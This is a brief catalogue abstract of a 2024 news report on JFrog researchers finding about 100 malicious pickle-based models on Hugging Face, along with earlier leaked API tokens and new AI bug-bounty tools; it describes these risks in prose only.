MIT Logo

Hugging Face AI Platform Riddled With 100 Malicious Code-Execution Models

Abstract:

JFrog Security Research scanned model files from Hugging Face, a platform that hosts open source machine learning models, to find that 100 models were malicious. The vulnerability is that the module file that initializes the model’s functions and architecture was altered to call pickle code files that could execute malicious behavior. Because not all pickle code is malicious, Hugging Face only give a warning when downloading modles with pickle code, and does not scan for malicious intent. Hugging Face has had other security risks reported in the past, such as when researcher found unsecure API access tokens to well-known open source commercial models, like Meta’s Llama. These access tokens allowed unfettered access to the model and datasets, possibly allowing the theft of commercial secrets and poisoning of training data. As a result of the growing number of security risks, new tools are being developed to find and secure these vulnerabilities, such as Huntr, and bug-bounty program specifically catered around AI models.

Author:
Elizabeth Montalbano
Year:
2024
Domain:
Dimension: ,
Region: ,
Data Type: ,
Keywords: ,
MIT Political Science
MIT Political Science
ECIR
GSS